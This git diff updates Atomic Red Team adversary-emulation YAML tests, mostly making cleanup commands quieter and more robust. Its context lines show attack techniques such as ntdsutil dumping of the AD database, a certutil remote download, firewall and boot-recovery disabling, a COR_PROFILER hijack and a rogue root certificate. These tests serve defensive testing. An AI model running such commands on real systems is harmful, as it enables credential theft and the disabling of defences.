diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 6d7938e1..9237d5e7 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -108,7 +108,7 @@ atomic_tests: mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: | - rmdir /q /s #{output_folder} + rmdir /q /s #{output_folder} >nul 2>&1 name: command_prompt elevation_required: true diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml index bb8989a6..4d51de53 100644 --- a/atomics/T1090.001/T1090.001.yaml +++ b/atomics/T1090.001/T1090.001.yaml @@ -79,7 +79,7 @@ atomic_tests: default: "1337" executor: command: netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} - cleanup_command: netsh interface portproxy delete v4tov4 listenport=#{listenport} + cleanup_command: netsh interface portproxy delete v4tov4 listenport=#{listenport} -ErrorAction Ignore | Out-Null name: powershell elevation_required: true diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index ca91eca7..b8f19df4 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -188,7 +188,7 @@ atomic_tests: command: | cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} cleanup_command: | - del #{local_path} + del #{local_path} >nul 2>&1 name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml index fee56889..a2d74e8c 100644 --- a/atomics/T1119/T1119.yaml +++ b/atomics/T1119/T1119.yaml @@ -28,7 +28,7 @@ atomic_tests: New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection} cleanup_command: | - Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null + Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 0c907b95..3231d454 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -14,9 +14,10 @@ atomic_tests: Start-Process $file1 /S; Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe' cleanup_command: |- - Start-Process 'C:\Program Files (x86)\TeamViewer\uninstall.exe' "/S" + $file = 'C:\Program Files (x86)\TeamViewer\uninstall.exe' + if(Test-Path $file){ Start-Process $file "/S" -ErrorAction Ignore | Out-Null } $file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe" - Remove-Item $file1 + Remove-Item $file1 -ErrorAction Ignore | Out-Null name: powershell elevation_required: true - name: AnyDesk Files Detected Test on Windows @@ -32,7 +33,7 @@ atomic_tests: Start-Process $file1 /S; cleanup_command: |- $file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe.exe" - Remove-Item $file1 + Remove-Item $file1 -ErrorAction Ignore name: powershell elevation_required: true - name: LogMeIn Files Detected Test on Windows @@ -48,9 +49,9 @@ atomic_tests: Start-Process $file1 /S; Start-Process 'C:\Program Files (x86)\LogMeInIgnition\LMIIgnition.exe' "/S" cleanup_command: |- - get-package *'LogMeIn Client'* | uninstall-package + get-package *'LogMeIn Client'* -ErrorAction Ignore | uninstall-package $file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi" - Remove-Item $file1 + Remove-Item $file1 -ErrorAction Ignore name: powershell elevation_required: true diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index e5a4705d..d0f6568e 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml @@ -61,8 +61,8 @@ atomic_tests: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no cleanup_command: | - bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures - bcdedit.exe /set {default} recoveryenabled yes + bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures >nul 2>&1 + bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1 name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell diff --git a/atomics/T1505.002/T1505.002.yaml b/atomics/T1505.002/T1505.002.yaml index 3c87a7ee..a2ccdea4 100644 --- a/atomics/T1505.002/T1505.002.yaml +++ b/atomics/T1505.002/T1505.002.yaml @@ -34,8 +34,10 @@ atomic_tests: Enable-TransportAgent #{transport_agent_identity} Get-TransportAgent | Format-List Name,Enabled cleanup_command: | - Disable-TransportAgent #{transport_agent_identity} - Uninstall-TransportAgent #{transport_agent_identity} - Get-TransportAgent + if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ + Disable-TransportAgent #{transport_agent_identity} + Uninstall-TransportAgent #{transport_agent_identity} + Get-TransportAgent + } name: powershell elevation_required: true diff --git a/atomics/T1546.001/T1546.001.yaml b/atomics/T1546.001/T1546.001.yaml index 09749cde..235eff3d 100644 --- a/atomics/T1546.001/T1546.001.yaml +++ b/atomics/T1546.001/T1546.001.yaml @@ -22,6 +22,6 @@ atomic_tests: command: | assoc #{extension_to_change}=#{target_extension_handler} cleanup_command: | - assoc .hta=htafile + assoc .hta=htafile >nul 2>&1 name: command_prompt diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index c51e61f5..5ad17c68 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml @@ -41,6 +41,6 @@ atomic_tests: command: | reg.exe import #{registry_file} cleanup_command: | - reg.exe import #{registry_cleanup_file} + reg.exe import #{registry_cleanup_file} >nul 2>&1 name: command_prompt elevation_required: true \ No newline at end of file diff --git a/atomics/T1546.011/T1546.011.yaml b/atomics/T1546.011/T1546.011.yaml index 70d75b28..a43a59bb 100644 --- a/atomics/T1546.011/T1546.011.yaml +++ b/atomics/T1546.011/T1546.011.yaml @@ -36,7 +36,7 @@ atomic_tests: command: | sdbinst.exe #{file_path} cleanup_command: | - sdbinst.exe -u #{file_path} + sdbinst.exe -u #{file_path} >nul 2>&1 name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index a03a1806..9e507c5d 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -39,11 +39,10 @@ atomic_tests: Write-Host "executing eventvwr.msc" -ForegroundColor Cyan START MMC.EXE EVENTVWR.MSC cleanup_command: | - Write-Host "Removing registry keys" -ForegroundColor Cyan - Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force - Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null - Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null - Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null + Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore + Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null name: powershell - name: COM Hijack Leveraging System Scope COR_PROFILER auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 @@ -79,10 +78,9 @@ atomic_tests: New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null cleanup_command: | - Write-Host "Removing system environment variables" -ForegroundColor Cyan - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null name: powershell elevation_required: true - name: COM Hijack Leveraging registry-free process scope COR_PROFILER diff --git a/atomics/T1551.006/T1551.006.yaml b/atomics/T1551.006/T1551.006.yaml index a043c130..b793b6e9 100644 --- a/atomics/T1551.006/T1551.006.yaml +++ b/atomics/T1551.006/T1551.006.yaml @@ -205,8 +205,6 @@ atomic_tests: import-module #{file_path}\timestomp.ps1 timestomp -dest "#{file_path}\kxwn.lock" cleanup_command: |- - Write-Host "Removing #{file_path}\timestomp.ps1" Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore - Write-Host "Removing #{file_path}\kxwn.lock" Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore name: powershell \ No newline at end of file diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index 399fec08..656227af 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -107,7 +107,7 @@ atomic_tests: if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My - Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path} + Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item executor: command: | @@ -115,7 +115,7 @@ atomic_tests: Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root" cleanup_command: | $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My - Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item - Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item - name: command_prompt + Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore + Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore + name: powershell elevation_required: true \ No newline at end of file diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index ef5ebb86..5899294d 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml @@ -297,7 +297,7 @@ atomic_tests: Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 name: powershell elevation_required: true -- name: Disable Microft Office Security Features +- name: Disable Microsoft Office Security Features auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 description: | Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not @@ -317,8 +317,8 @@ atomic_tests: New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword" New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword" cleanup_command: | - Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" - Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" + Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null + Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore name: powershell - name: Remove Windows Defender Definition Files auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml index 9743565f..4c844efc 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1562.002/T1562.002.yaml @@ -17,5 +17,7 @@ atomic_tests: command: | C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true cleanup_command: | - C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false + if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ + C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null + } name: powershell \ No newline at end of file diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 116cdec6..cb52d1d4 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -31,7 +31,7 @@ atomic_tests: command: | netsh advfirewall set currentprofile state off cleanup_command: | - netsh advfirewall set currentprofile state on + netsh advfirewall set currentprofile state on >nul 2>&1 name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -45,7 +45,7 @@ atomic_tests: netsh advfirewall firewall set rule group="remote desktop" new enable=Yes netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: | - netsh advfirewall reset + netsh advfirewall reset >nul 2>&1 name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -58,6 +58,6 @@ atomic_tests: executor: command: | netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450 - cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 + cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1 name: command_prompt elevation_required: true